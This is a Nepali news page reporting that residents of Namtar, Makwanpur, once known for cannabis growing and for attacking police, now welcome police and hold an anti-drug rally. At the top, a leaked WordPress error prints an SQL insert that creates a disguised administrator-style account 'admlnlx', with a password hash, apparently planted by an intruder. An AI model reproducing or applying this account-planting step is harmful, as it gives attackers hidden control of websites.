WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWE27.QQFZhivSYToUcEqHWvkZ3LeZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-26 05:27:39', '', 'admlnlx', 'admlnlx')
मकवानपुर,पुस १० –
गतवर्ष प्रहरी टोली मकवानपुरको नामदार पुग्दा स्थानीयले ढुंगामुढा मात्रै गरेनन्, गोली पनि चलाए । आजको नयाँ पत्रिका दैनिक लेख्छ– गाँजाखेती नष्ट गर्न पुगेका प्रहरी टोलीलाई उनीहरुले आक्रमण गरेका थिए । तर त्यही ठाउँमा बिहिबार प्रहरी टोली पुग्दा सर्वसाधारणले फूलमालाले स्वागत गरे ।
चरेसको केन्द्रको रुपमा बदनाम बनेको नामटारका सर्वसाधारणले गाँजाखेती तथा लागूऔषधविरुद्ध ठूलो र्याली समेत आयाजना गरे ।
गाउँका स्थानीय अगुवा तथा प्रहरी मिलेर यस्तो परिवर्तन ल्याएका हुन् ।